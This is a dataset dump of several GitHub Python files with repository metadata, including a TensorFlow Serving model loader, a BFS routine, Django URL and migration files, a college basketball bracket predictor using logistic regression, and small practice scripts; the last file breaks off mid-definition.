| Column | Type |
|---|---|
| blob_id | string (length 40) |
| directory_id | string (length 40) |
| path | string (length 3 to 281) |
| content_id | string (length 40) |
| detected_licenses | list (0 to 57 items) |
| license_type | string (2 classes) |
| repo_name | string (length 6 to 116) |
| snapshot_id | string (length 40) |
| revision_id | string (length 40) |
| branch_name | string (313 classes) |
| visit_date | timestamp[us] |
| revision_date | timestamp[us] |
| committer_date | timestamp[us] |
| github_id | int64 (18.2k to 668M, nullable) |
| star_events_count | int64 (0 to 102k) |
| fork_events_count | int64 (0 to 38.2k) |
| gha_license_id | string (17 classes) |
| gha_event_created_at | timestamp[us] |
| gha_created_at | timestamp[us] |
| gha_language | string (107 classes) |
| src_encoding | string (20 classes) |
| language | string (1 class) |
| is_vendor | bool (2 classes) |
| is_generated | bool (2 classes) |
| length_bytes | int64 (4 to 6.02M) |
| extension | string (78 classes) |
| content | string (length 2 to 6.02M) |
| authors | list (1 item) |
| author | string (length 0 to 175) |

Each record below follows this schema, with fields separated by `|`.
c09f88c25686fb1faac2e42d494e7f86ee7d7702
|
ae0c2806c009263fbd608b1381d96eb378ff115b
|
/aizynthfinder/utils/models.py
|
30f964dcb6fcb867dfd6a421ad9798c733115492
|
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
yinxx/aizynthfinder
|
45efcbafcf1d11199ec997129bc6a44ad4365952
|
20a7aed2db46e7df9dfeeaae0427f1e6e01b54e3
|
refs/heads/master
| 2023-06-25T00:21:36.983089
| 2021-07-26T08:52:47
| 2021-07-26T08:52:47
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 9,042
|
py
|
""" Module containing helper routines for using Keras and Tensorflow models
"""
from __future__ import annotations
import functools
import os
from typing import TYPE_CHECKING
import numpy as np
import requests
import grpc
import tensorflow as tf
from google.protobuf.json_format import MessageToDict
from tensorflow_serving.apis import (
predict_pb2,
get_model_metadata_pb2,
prediction_service_pb2_grpc,
)
from tensorflow.keras.metrics import top_k_categorical_accuracy
from tensorflow.keras.models import load_model as load_keras_model
from aizynthfinder.utils.logging import logger
from aizynthfinder.utils.exceptions import ExternalModelAPIError
if TYPE_CHECKING:
from aizynthfinder.utils.type_utils import Any, Union, Callable, List
_ModelInput = Union[np.ndarray, List[np.ndarray]]
top10_acc = functools.partial(top_k_categorical_accuracy, k=10)
top10_acc.__name__ = "top10_acc" # type: ignore
top50_acc = functools.partial(top_k_categorical_accuracy, k=50)
top50_acc.__name__ = "top50_acc" # type: ignore
CUSTOM_OBJECTS = {"top10_acc": top10_acc, "top50_acc": top50_acc, "tf": tf}
_logger = logger()
TF_SERVING_HOST = os.environ.get("TF_SERVING_HOST")
TF_SERVING_REST_PORT = os.environ.get("TF_SERVING_REST_PORT")
TF_SERVING_GRPC_PORT = os.environ.get("TF_SERVING_GRPC_PORT")
def load_model(
source: str, key: str, use_remote_models: bool
) -> Union["LocalKerasModel", "ExternalModelViaGRPC", "ExternalModelViaREST"]:
"""
Load model from a configuration specification.
If `use_remote_models` is True, tries to load:
1. A Tensorflow server through gRPC
2. A Tensorflow server through REST API
3. A local model
otherwise it just loads the local model
    :param source: the filename used when falling back to a local model
    :param key: the model name used when connecting to a Tensorflow server
    :param use_remote_models: if True, try to connect to a remote model server
    :return: a model object with a predict method
"""
if not use_remote_models:
return LocalKerasModel(source)
try:
return ExternalModelViaGRPC(key)
except ExternalModelAPIError:
pass
try:
return ExternalModelViaREST(key)
except ExternalModelAPIError:
pass
return LocalKerasModel(source)
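# Illustrative usage (not part of the original module; the checkpoint name and
# model key below are hypothetical): force the local fallback, then query it.
#
#     model = load_model("expansion_policy.hdf5", key="expansion",
#                        use_remote_models=False)
#     probs = model.predict(np.zeros((1, len(model)), dtype=np.float32))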
class LocalKerasModel:
"""
A keras policy model that is executed locally.
The size of the input vector can be determined with the len() method.
:ivar model: the compiled model
:ivar output_size: the length of the output vector
:param filename: the path to a Keras checkpoint file
"""
def __init__(self, filename: str) -> None:
self.model = load_keras_model(filename, custom_objects=CUSTOM_OBJECTS)
try:
self._model_dimensions = int(self.model.input.shape[1])
except AttributeError:
self._model_dimensions = int(self.model.input[0].shape[1])
self.output_size = int(self.model.output.shape[1])
def __len__(self) -> int:
return self._model_dimensions
def predict(self, input_: _ModelInput) -> np.ndarray:
"""
Perform a forward pass of the neural network.
:param input_: the input vector
:return: the vector of the output layer
"""
return self.model.predict(input_)
def _log_and_reraise_exceptions(method: Callable) -> Callable:
@functools.wraps(method)
def wrapper(*args, **kwargs):
try:
return method(*args, **kwargs)
except Exception as err:
msg = "Error when requesting from tensorflow model API"
_logger.error("%s: %s", msg, err)
raise ExternalModelAPIError(msg)
return wrapper
class ExternalModelViaREST:
"""
A neural network model implementation using TF Serving via REST API.
:param name: the name of model
"""
def __init__(self, name: str) -> None:
self._model_url = self._get_model_url(name)
self._sig_def = self._get_sig_def()
def __len__(self) -> int:
first_input_name = list(self._sig_def["inputs"].keys())[0]
return int(
self._sig_def["inputs"][first_input_name]["tensor_shape"]["dim"][1]["size"]
)
def predict(self, inputs: _ModelInput) -> np.ndarray:
"""
Get prediction from model.
:param inputs: the input vector or list of vectors
:return: the vector of the output layer
"""
url = self._model_url + ":predict"
res = self._handle_rest_api_request(
"POST", url, json=self._make_payload(inputs)
)
return np.asarray(res["outputs"])
def _get_sig_def(self) -> dict:
res = self._handle_rest_api_request("GET", self._model_url + "/metadata")
return res["metadata"]["signature_def"]["signature_def"]["serving_default"]
# pylint: disable=no-self-use
@_log_and_reraise_exceptions
def _handle_rest_api_request(
self, method: str, url: str, *args: Any, **kwargs: Any
) -> dict:
res = requests.request(method, url, *args, **kwargs)
if res.status_code != 200 or (
res.headers["Content-Type"] != "application/json"
):
raise ExternalModelAPIError(
f"Unexpected response from REST API: {res.status_code}\n{res.text}"
)
return res.json()
def _make_payload(self, inputs: _ModelInput) -> dict:
if isinstance(inputs, np.ndarray):
inputs = [inputs]
data = {
name: fp.tolist()
for name, fp in zip(self._sig_def["inputs"].keys(), inputs)
}
return {"inputs": data}
@staticmethod
def _get_model_url(name: str) -> str:
warning = f"Failed to get url of REST service for external model {name}"
        if not TF_SERVING_HOST:
            _logger.warning(warning)
            raise ExternalModelAPIError(f"Host not set for model {name}")
        if not TF_SERVING_REST_PORT:
            _logger.warning(warning)
            raise ExternalModelAPIError(f"REST port not set for model {name}")
return f"http://{TF_SERVING_HOST}:{TF_SERVING_REST_PORT}/v1/models/{name}"
class ExternalModelViaGRPC:
"""
A neural network model implementation using TF Serving via gRPC.
:param name: the name of model
"""
def __init__(self, name: str) -> None:
self._server = self._get_server(name)
self._model_name = name
self._sig_def = self._get_sig_def()
def __len__(self) -> int:
first_input_name = list(self._sig_def["inputs"].keys())[0]
return int(
self._sig_def["inputs"][first_input_name]["tensorShape"]["dim"][1]["size"]
)
@_log_and_reraise_exceptions
def predict(self, inputs: _ModelInput) -> np.ndarray:
"""
Get prediction from model.
:param inputs: the input vector or list of vectors
:return: the vector of the output layer
"""
input_tensors = self._make_payload(inputs)
channel = grpc.insecure_channel(self._server)
service = prediction_service_pb2_grpc.PredictionServiceStub(channel)
request = predict_pb2.PredictRequest()
request.model_spec.name = self._model_name
for name, tensor in input_tensors.items():
request.inputs[name].CopyFrom(tensor)
key = list(self._sig_def["outputs"].keys())[0]
return tf.make_ndarray(service.Predict(request, 10.0).outputs[key])
@_log_and_reraise_exceptions
def _get_sig_def(self) -> dict:
channel = grpc.insecure_channel(self._server)
service = prediction_service_pb2_grpc.PredictionServiceStub(channel)
request = get_model_metadata_pb2.GetModelMetadataRequest()
request.model_spec.name = self._model_name
request.metadata_field.append("signature_def")
result = MessageToDict(service.GetModelMetadata(request, 10.0))
# close the channel so that it won't be reused after fork and fail
channel.close()
return result["metadata"]["signature_def"]["signatureDef"]["serving_default"]
def _make_payload(self, inputs: _ModelInput) -> dict:
if isinstance(inputs, np.ndarray):
inputs = [inputs]
tensors = {}
for name, fp_ in zip(self._sig_def["inputs"].keys(), inputs):
size = int(self._sig_def["inputs"][name]["tensorShape"]["dim"][1]["size"])
tensors[name] = tf.make_tensor_proto(fp_, dtype=np.float32, shape=(1, size))
return tensors
@staticmethod
def _get_server(name: str) -> str:
warning = f"Failed to get gRPC server for external model {name}"
if not TF_SERVING_HOST:
_logger.warning(warning)
raise ExternalModelAPIError(f"Host not set for model {name}")
if not TF_SERVING_GRPC_PORT:
_logger.warning(warning)
raise ExternalModelAPIError(f"GRPC port not set for model {name}")
return f"{TF_SERVING_HOST}:{TF_SERVING_GRPC_PORT}"
|
[
"samuel.genheden@gmail.com"
] |
samuel.genheden@gmail.com
|
93f4ab82289a1cae7bd28c9673a3261468fa1ea4
|
bf1cf014b2965fb8d38f7a58cc812dcd65719ed9
|
/Other/bfs.py
|
5b6e888e47f512b80377dd550e7902822ea62a5c
|
[] |
no_license
|
imthefrizzlefry/PythonPractice
|
c07408592b0f5234217ec448cd2b81415332afbc
|
954a25e77435d97a1a0f12c38568ee68686e6960
|
refs/heads/master
| 2021-02-20T16:23:56.483052
| 2020-06-13T08:08:54
| 2020-06-13T08:08:54
| 245,341,475
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 351
|
py
|
def BFS(s, Adj):
    """Breadth-first search from source s over adjacency mapping Adj.
    Returns the level (distance) and parent maps."""
    level = {s: 0}
    parent = {s: None}
    i = 1
    frontier = [s]
    while frontier:
        next_frontier = []          # nodes discovered at distance i
        for u in frontier:
            for v in Adj[u]:
                if v not in level:  # first time v is seen
                    level[v] = i
                    parent[v] = u
                    next_frontier.append(v)
        frontier = next_frontier
        i += 1
    return level, parent
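# Illustrative usage (not in the original file): run BFS on a small
# adjacency-list graph and inspect the computed distances.
adj = {'a': ['b', 'c'], 'b': ['d'], 'c': [], 'd': []}
levels, parents = BFS('a', adj)
print(levels)   # {'a': 0, 'b': 1, 'c': 1, 'd': 2}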
|
[
"imthefrizzlefry@gmail.com"
] |
imthefrizzlefry@gmail.com
|
aa15d2821db84d76f0d3d14f1a925ab2dafb08e2
|
ad5b54e8578a85270035fc4020a1c143f040bc88
|
/accounts/urls.py
|
8400662b63951436769a75eb44404dfd475df9af
|
[] |
no_license
|
7990satyam200/flickclone
|
18c6e181bc9daaaea0f75e7f6838df3e99d818be
|
0e461030e55c445b27dcc9216af9a0941266fcb2
|
refs/heads/master
| 2022-12-09T08:02:07.814093
| 2020-07-22T14:06:38
| 2020-07-22T14:06:38
| 142,027,713
| 0
| 0
| null | 2022-09-23T22:30:00
| 2018-07-23T14:43:40
|
CSS
|
UTF-8
|
Python
| false
| false
| 571
|
py
|
from django.urls import path, include
from .views import profile, signup, myhome
from django.contrib.auth import views
urlpatterns = [
    # path('signup', user_creation, name='signup'),
    path('signup', signup, name='signup'),
    path('', myhome, name='home'),
    # path('register', register, name='register'),
    path('profile', profile, name='profile'),
    path('login', views.LoginView.as_view(), name='login'),
    path('oauth/', include('social_django.urls', namespace='social')),
    path('logout/', views.LogoutView.as_view(), name='logout'),
]
|
[
"satyammishrastanford@gmail.com"
] |
satyammishrastanford@gmail.com
|
680c9979e7e3ba578be70bbc89a825ccf18bbc4b
|
770989d54a53a431a9fc7b5d292c109e534176ac
|
/InterviewQ/reverseNum.py
|
a351afdca76f79380bb8be1c0364a3358abc1a5e
|
[] |
no_license
|
pawansingh10/PracticeDemo
|
7d21c9cd2007213b25ae972f22cfa08cf8ccaa40
|
ea6a74c12ea5964a04ceffaa2976638b4cf82a70
|
refs/heads/master
| 2022-12-09T15:31:05.428684
| 2020-09-02T11:00:28
| 2020-09-02T11:00:28
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 217
|
py
|
def reverse(n):
    temp = n
    result = 0                    # renamed so it does not shadow the function
    while n > 0:
        rem = n % 10              # peel off the last digit
        result = (result * 10) + rem
        n = n // 10
    return f'Reverse of {temp} is {result}'
n=int(input("Enter a num:"))
print(reverse(n))
|
[
"pawansinghkk109@gmail.com"
] |
pawansinghkk109@gmail.com
|
0821372ed21e443f9b92543cf15566b5b9260d3d
|
3c24d61873e985e0979b7c43e979f03f8122eb61
|
/ControlPanel/migrations/0002_auto_20171023_0906.py
|
fada7f7052571621d3db3207ce134fecee265d46
|
[] |
no_license
|
Mansuete/Rozklad
|
83209bc9dc16f95a95bfbaf438004732326d558a
|
300fa33939a1c26eb1f063c2f00fded9bca0a944
|
refs/heads/master
| 2021-08-10T15:09:59.062022
| 2017-11-12T18:21:26
| 2017-11-12T18:21:26
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,273
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-10-23 06:06
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('ControlPanel', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='DayInGroup',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', models.DateTimeField(auto_now_add=True)),
('updated', models.DateTimeField(auto_now=True)),
('day_name', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='ControlPanel.Day')),
('group_name', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to='ControlPanel.Group')),
],
options={
'verbose_name': 'День навчання в групі',
'verbose_name_plural': 'Дні навчання в групах',
},
),
migrations.RenameModel(
old_name='Lesson',
new_name='LessonName',
),
]
|
[
"mansuete98@gmail.com"
] |
mansuete98@gmail.com
|
771c4877e1e56e8d4e5f76036070730611638a89
|
59d4f15f524bf7942691ce535bab896001bd6d88
|
/src/sw/allotmentclub/alembic/versions/add_ah_signature_e2cfe9da21cf.py
|
b0ac2dcc31778b36bc4cd79f5b46d1d011f49b60
|
[
"ZPL-2.1",
"MIT"
] |
permissive
|
sweh/sw.allotmentclub.backend
|
93dfc667799a3dd7dd7cfcccb175cf61cb94721d
|
eb7f108e9e5d36b59e771cce105c3a68e421a90b
|
refs/heads/master
| 2023-08-05T02:36:06.186518
| 2023-07-30T11:57:28
| 2023-07-30T11:57:28
| 121,388,106
| 2
| 0
|
NOASSERTION
| 2023-06-30T22:26:17
| 2018-02-13T13:51:22
|
Python
|
UTF-8
|
Python
| false
| false
| 765
|
py
|
"""Add ah signature
Revision ID: e2cfe9da21cf
Revises: 897a3181401e
Create Date: 2020-10-15 07:20:57.570537
"""
from alembic import op
import base64
import pkg_resources
# revision identifiers, used by Alembic.
revision = 'e2cfe9da21cf'
down_revision = '897a3181401e'
def upgrade():
signature = base64.b64encode(
pkg_resources.resource_stream(
'sw.allotmentclub.signatures', 'ah.png').read()
).decode()
signature = f'data:application/png;base64,{signature}'
op.execute(f"""UPDATE public.user SET
signature = '{signature}'
WHERE username = 'ah';""")
def downgrade():
op.execute("""UPDATE public.user SET
signature = ''
WHERE username = 'ah';""")
|
[
"sebastian@wehrmann.de"
] |
sebastian@wehrmann.de
|
93eebe7837cbbf5e07c5ae15e3fc60d134c2473b
|
0649b9aad2cc17e2e535795732ab5adb891401c2
|
/src/landmarks/models.py
|
4c526a7db2fceccadb5ad3544b712cff509f6a1d
|
[] |
no_license
|
abdallahokasha/django-demo
|
501ee66ff39db03571488a74a8f556088e1f4f53
|
0485e7b55bbe5bbacf258b1aabd2a2bb222052f5
|
refs/heads/master
| 2021-06-11T15:53:58.912483
| 2020-06-20T10:03:39
| 2020-06-20T10:03:39
| 143,612,888
| 0
| 0
| null | 2021-06-10T20:43:41
| 2018-08-05T12:56:53
|
Python
|
UTF-8
|
Python
| false
| false
| 663
|
py
|
from __future__ import unicode_literals
from django.db import models
from django_countries.fields import CountryField
# Create your models here.
class Landmark(models.Model):
title = models.CharField(max_length=50, unique=True)
description = models.TextField(max_length=500)
country = CountryField()
latitude = models.FloatField(default="30.044281")
longitude = models.FloatField(default="31.340002")
created_at = models.DateTimeField(auto_now=False, auto_now_add=True)
updated_at = models.DateTimeField(auto_now=True, auto_now_add=False)
def __unicode__(self):
return self.title
def __str__(self):
return self.title
|
[
"abdookasha56@gmail.com"
] |
abdookasha56@gmail.com
|
5409791ba70015c93c1ee6d56aeb7b933d972ae7
|
8edc5c687d8c18951f770d4d5debd1324d28c06d
|
/archive/logistic_regression.py
|
a1bafe0ea7247884c77a9e0de10cc18439d86768
|
[] |
no_license
|
geerc/bracketlytics
|
cac14ea3fef921f9ad254c942312852565784ef6
|
2a0253a90763f1164e241f8b49a6f2f8dd5ab0de
|
refs/heads/master
| 2021-06-10T04:02:19.615815
| 2021-04-06T14:19:19
| 2021-04-06T14:19:19
| 152,919,933
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 13,040
|
py
|
import numpy as np
import pandas as pd
import seaborn as sb
import functions
from queue import Queue  # only Queue is used from this module
from pandas import Series, DataFrame
from pylab import rcParams
from sklearn import preprocessing
from sklearn.linear_model import LogisticRegression
from sklearn.model_selection import train_test_split
from sklearn import metrics
from sklearn.metrics import classification_report
round1 = Queue()
round2 = Queue()
round3 = Queue()
round4 = Queue()
round5 = Queue()
round6 = Queue()
round7 = Queue()
ROOT = '/Users/christiangeer/bracketlytics'
game_data = pd.read_csv(ROOT + '/data/2018TeamStats_Final.csv')
season_stats = pd.read_csv(ROOT + '/data/kaggle_data/season_data.csv')
sos = pd.read_csv(ROOT + '/data/sos.csv')
# Remove unnecessary columns
game_data.drop(labels=['gameid','Opp PTS','PF','Opp PF','Rank','MP','FG%','2P','2PA','2P%','3PA','3P%','FT%','TRB','AST','STL','BLK','PTS','Opp FG%','Opp 2P','Opp 2PA','Opp 2P%','Opp 3PA','Opp 3P%','Opp FT%','Opp TRB','Opp AST','Opp STL','Opp BLK'], inplace=True, axis=1)
season_stats.drop(labels=['X.11','X.10','X.9','X.8','X.7','X.6','X.5','X.4','X.3','X.2','X.1','X','Rank','SOS'], inplace=True, axis=1)
sos.drop(labels=['Unnamed: 0','X.11','X.10','X.9','X.8','X.7','X.6','X.5','X.4','X.3','X.2','X.1','X','Rank'], inplace=True, axis=1)
# print(sos)
# sos['SOS'] = sos['SOS'] + 12.48
# sos.sort_values(by=['SOS'])
# Set team as index
season_stats.set_index('Team', inplace=True)
sos.set_index('Team', inplace=True)
# Convert to lower case
sos.index = sos.index.str.lower()
# Convert stat variables to numeric
game_data['FG'] = game_data['FG'].apply(pd.to_numeric, errors='coerce')
game_data['FGA'] = game_data['FGA'].apply(pd.to_numeric, errors='coerce')
game_data['3P'] = game_data['3P'].apply(pd.to_numeric, errors='coerce')
game_data['FT'] = game_data['FT'].apply(pd.to_numeric, errors='coerce')
game_data['FTA'] = game_data['FTA'].apply(pd.to_numeric, errors='coerce')
game_data['ORB'] = game_data['ORB'].apply(pd.to_numeric, errors='coerce')
game_data['DRB'] = game_data['DRB'].apply(pd.to_numeric, errors='coerce')
game_data['TOV'] = game_data['TOV'].apply(pd.to_numeric, errors='coerce')
game_data['Win?'] = game_data['Win?'].apply(pd.to_numeric, errors='coerce')
game_data['Opp FG'] = game_data['Opp FG'].apply(pd.to_numeric, errors='coerce')
game_data['Opp FGA'] = game_data['Opp FGA'].apply(pd.to_numeric, errors='coerce')
game_data['Opp 3P'] = game_data['Opp 3P'].apply(pd.to_numeric, errors='coerce')
game_data['Opp FT'] = game_data['Opp FT'].apply(pd.to_numeric, errors='coerce')
game_data['Opp FTA'] = game_data['Opp FTA'].apply(pd.to_numeric, errors='coerce')
game_data['Opp ORB'] = game_data['Opp ORB'].apply(pd.to_numeric, errors='coerce')
game_data['Opp DRB'] = game_data['Opp DRB'].apply(pd.to_numeric, errors='coerce')
game_data['Opp TOV'] = game_data['Opp TOV'].apply(pd.to_numeric, errors='coerce')
functions.create_stats(game_data)
functions.create_stats(season_stats)
# Drop unnecessary columns
game_data.drop(labels=['FG','FGA','3P','FT','FTA','ORB','DRB','TOV','Opp FG','Opp FGA','Opp 3P','Opp FT','Opp FTA','Opp ORB','Opp DRB','Opp TOV'], inplace=True, axis=1)
season_stats.drop(labels=['Unnamed: 0','FG','3P','FGA','FT','FTA','ORB','DRB','TOV','Opp FG','Opp FGA','Opp 3P','Opp FT','Opp FTA','Opp ORB','Opp DRB','Opp TOV'], inplace=True, axis=1)
X = game_data.iloc[:,2:10].values
y = game_data.iloc[:,1].values
# Create training and testing vars
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = .3, random_state=25)
X_train = pd.DataFrame(X)
y_train = pd.DataFrame(y)
# Remove na values
X_train = X_train.dropna(axis=0, how='all')
y_train = y_train.drop(y_train.index[5282])
# Create and fit the regression
LogReg = LogisticRegression()
LogReg.fit(X_train, y_train)
result = LogReg.score(X_test, y_test)
print("Accuracy: %.2f%%" % (result*100.0))
# from sklearn.metrics import confusion_matrix
# confusion_matrix = confusion_matrix(y_test, y_pred)
# print('Confusion Matrix: \n', confusion_matrix)
#
# print(classification_report(y_test, y_pred))
# Predict each team's probability of winning and return the likelier team
def predict_game(high_seed, low_seed):
if high_seed != 1 and low_seed != 1:
# Get stats for two teams playing
team1a = season_stats.loc[high_seed]
team1a = team1a.loc[['eFG%','TOVp','ORBp','FTp']]
team2a = season_stats.loc[low_seed]
team2a = team2a.loc[['eFG%','TOVp','ORBp','FTp']]
team2a = team2a.rename({'eFG%':'Opp_eFG%', 'TOVp':'Opp_TOVp', 'ORBp':'Opp_ORBp', 'FTp':'Opp_FTp'})
team1b = season_stats.loc[low_seed]
team1b = team1b.loc[['eFG%','TOVp','ORBp','FTp']]
team2b = season_stats.loc[high_seed]
team2b = team2b.loc[['eFG%','TOVp','ORBp','FTp']]
team2b = team2b.rename({'eFG%':'Opp_eFG%', 'TOVp':'Opp_TOVp', 'ORBp':'Opp_ORBp', 'FTp':'Opp_FTp'})
# Create game from perspective of both teams
game_a = team2a.append(team1a)
game_b = team1b.append(team2b)
# Change series to dataframe so that it can be fed into the model
game = DataFrame(dict(s1 = game_a, s2 = game_b))
# Transpose df and rename indices
game = game.T
game = game.rename({'s1': high_seed, 's2': low_seed}, axis='index')
        # Predict probabilities of winning
        y_pred_prob = LogReg.predict_proba(game)
        # Select just each team's probability of winning
team1 = y_pred_prob[0, 0]
team2 = y_pred_prob[1, 0]
# Create strength of schedule
high_seed_sos = sos.loc[high_seed].iloc[0]
low_seed_sos = sos.loc[low_seed].iloc[0]
# Determine winner
if team1 * high_seed_sos > team2 * low_seed_sos:
winner = high_seed
elif team2 * low_seed_sos > team1 * high_seed_sos:
winner = low_seed
return(winner)
# print(winner)
elif high_seed == 1:
return low_seed
# print(low_seed)
elif low_seed == 1:
return high_seed
# print(high_seed)
# Function to move winning team to next round
def advance_team(winner, round):
print(winner)
round.put(winner)
def create_bracket(round1):
# South Region
try:
round1.put('virginia')
except KeyError:
round1.put(1)
try:
round1.put('maryland-baltimore-county')
except KeyError:
round1.put(1)
try:
round1.put('creighton')
except KeyError:
round1.put(1)
try:
round1.put('kansas-state')
except KeyError:
round1.put(1)
try:
round1.put('kentucky')
except KeyError:
round1.put(1)
try:
round1.put('davidson')
except KeyError:
round1.put(1)
try:
round1.put('arizona')
except KeyError:
round1.put(1)
try:
round1.put('buffalo')
except KeyError:
round1.put(1)
try:
round1.put('miami-fl')
except KeyError:
round1.put(1)
try:
round1.put('loyola-il')
except KeyError:
round1.put(1)
try:
round1.put('tennessee')
except KeyError:
round1.put(1)
try:
round1.put('wright-state')
except KeyError:
round1.put(1)
try:
round1.put('nevada')
except KeyError:
round1.put(1)
try:
round1.put('texas')
except KeyError:
round1.put(1)
try:
round1.put('cincinnati')
except KeyError:
round1.put(1)
try:
round1.put('georgia-state')
except KeyError:
round1.put(1)
# West Region
try:
round1.put('xavier')
except KeyError:
round1.put(1)
try:
round1.put('texas-southern')
except KeyError:
round1.put(1)
try:
round1.put('missouri')
except KeyError:
round1.put(1)
try:
round1.put('florida-state')
except KeyError:
round1.put(1)
try:
round1.put('ohio-state')
except KeyError:
round1.put(1)
try:
round1.put('south-dakota-state')
except KeyError:
round1.put(1)
try:
round1.put('gonzaga')
except KeyError:
round1.put(1)
try:
round1.put('north-carolina-greensboro')
except KeyError:
round1.put(1)
try:
round1.put('houston')
except KeyError:
round1.put(1)
try:
round1.put('san-diego-state')
except KeyError:
round1.put(1)
try:
round1.put('michigan')
except KeyError:
round1.put(1)
try:
round1.put('montana')
except KeyError:
round1.put(1)
try:
round1.put('texas-am')
except KeyError:
round1.put(1)
try:
round1.put('providence')
except KeyError:
round1.put(1)
try:
round1.put('north-carolina')
except KeyError:
round1.put(1)
try:
round1.put('lipscomb')
except KeyError:
round1.put(1)
# East region
try:
round1.put('villanova')
except KeyError:
round1.put(1)
try:
round1.put('radford')
except KeyError:
round1.put(1)
try:
round1.put('virginia-tech')
except KeyError:
round1.put(1)
try:
round1.put('alabama')
except KeyError:
round1.put(1)
try:
round1.put('west-virginia')
except KeyError:
round1.put(1)
try:
round1.put('murray-state')
except KeyError:
round1.put(1)
try:
round1.put('wichita-state')
except KeyError:
round1.put(1)
try:
round1.put('marshall')
except KeyError:
round1.put(1)
try:
round1.put('florida')
except KeyError:
round1.put(1)
try:
round1.put('st-bonaventure')
except KeyError:
round1.put(1)
try:
round1.put('texas-tech')
except KeyError:
round1.put(1)
try:
round1.put(1)
except KeyError:
round1.put(1)
try:
round1.put('arkansas')
except KeyError:
        round1.put(1)
try:
round1.put('butler')
except KeyError:
round1.put(1)
try:
round1.put('purdue')
except KeyError:
round1.put(1)
try:
round1.put('cal-state-fullerton')
except KeyError:
round1.put(1)
# Midwest region
try:
round1.put('kansas')
except KeyError:
round1.put(1)
try:
round1.put('pennsylvania')
except KeyError:
round1.put(1)
try:
round1.put('seton-hall')
except KeyError:
round1.put(1)
try:
round1.put('north-carolina-state')
except KeyError:
round1.put(1)
try:
round1.put('clemson')
except KeyError:
round1.put(1)
try:
round1.put('new-mexico-state')
except KeyError:
round1.put(1)
try:
round1.put('auburn')
except KeyError:
round1.put(1)
try:
round1.put('college-of-charleston')
except KeyError:
round1.put(1)
try:
round1.put('texas-christian')
except KeyError:
round1.put(1)
try:
round1.put('syracuse')
except KeyError:
round1.put(1)
try:
round1.put('michigan-state')
except KeyError:
round1.put(1)
try:
round1.put('bucknell')
except KeyError:
round1.put(1)
try:
round1.put('rhode-island')
except KeyError:
round1.put(1)
try:
round1.put('oklahoma')
except KeyError:
round1.put(1)
try:
round1.put('duke')
except KeyError:
round1.put(1)
try:
round1.put('iona')
except KeyError:
round1.put(1)
return round1
round1 = create_bracket(round1)
# Round 1 games
n = 0
print("\nAdvance to round of 32:")
while n < 32:
high_seed = round1.get()
low_seed = round1.get()
advance_team(predict_game(high_seed, low_seed), round2)
n += 1
# Round 2 games
n = 0
print("\nAdvance to Sweet 16:")
while n < 16:
high_seed = round2.get()
low_seed = round2.get()
advance_team(predict_game(high_seed, low_seed), round3)
n += 1
# Round 3 games
n = 0
print("\nAdvance to Elite 8:")
while n < 8:
high_seed = round3.get()
low_seed = round3.get()
advance_team(predict_game(high_seed, low_seed), round4)
n += 1
# Round 4 games
n = 0
print("\nAdvance to Final 4:")
while n < 4:
high_seed = round4.get()
low_seed = round4.get()
advance_team(predict_game(high_seed, low_seed), round5)
n += 1
# Round 5 games
n = 0
print("\nAdvance to Championship game:")
while n < 2:
high_seed = round5.get()
low_seed = round5.get()
advance_team(predict_game(high_seed, low_seed), round6)
n += 1
# Championship
n = 0
print("\nChampion:")
high_seed = round6.get()
low_seed = round6.get()
advance_team(predict_game(high_seed, low_seed), round7)
|
[
"geerc@allegheny.edu"
] |
geerc@allegheny.edu
|
91639f4cb58fb98baf23043a134799e43c477abe
|
07dd30282dfebd49f085aa9a1ef8eec86249fc13
|
/Recruitment/apps/home/migrations/0012_company_companyemail.py
|
d4436a09ca72072a5ef499ddd6af784d7e1f5efb
|
[] |
no_license
|
tkhto/Recruitment
|
4af6e1cf3668e10deb9c714ac6b25440ac007182
|
8e551d417b6ba0143bd9636a85ea46ebaba944f4
|
refs/heads/master
| 2021-05-25T07:55:54.023581
| 2020-04-01T08:51:45
| 2020-04-01T08:51:45
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 457
|
py
|
# Generated by Django 2.2.8 on 2020-03-25 12:05
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('home', '0011_banners'),
]
operations = [
migrations.AddField(
model_name='company',
name='companyEmail',
field=models.TextField(default='12345@aa.com', verbose_name='企业邮箱列表'),
preserve_default=False,
),
]
|
[
"11789014@qq.com"
] |
11789014@qq.com
|
2e0ccc75e8c2d4ee4a8d8c0cbb29d30c6e44106e
|
bdd7779b8fd15e96ed09111843e3f202108b78fd
|
/cos1.py
|
e12c34abc8d6e5f995c2b104df912270bdd3a28f
|
[] |
no_license
|
s22624-pjwstk/konsulatacje
|
aa63216e96e5cfa1a25ab27853cad2920ab8b1f9
|
8742f806d8ca8413a4a833017cdcfc1ef436e78a
|
refs/heads/main
| 2023-03-27T07:04:18.569441
| 2021-03-30T19:41:54
| 2021-03-30T19:41:54
| 353,121,341
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 642
|
py
|
def cos(x):
print(x)
cos(2)
def zewnetrzna(a):       # "outer" function
    def wewnetrzna():    # "inner" function, closes over a
        print(a)
    wewnetrzna()
zewnetrzna(3)
def operator(s):
def plus(a,b):
return a+b
def minus(a,b):
return a-b
if s=="+":
return plus
elif s=="-":
return minus
o=operator("+")
print(o)
print(o(2,3))
def add(n):
def add_imple(x):
return n+x
return add_imple
print(add(1)(2))
def mr(fn):                # decorator: prefixes the greeting with "mr"
    def jakkolwiek(s):     # wrapper ("jakkolwiek" = "whatever")
        s = "mr {}".format(s)
        return fn(s)
    return jakkolwiek
@mr
def hello(s):
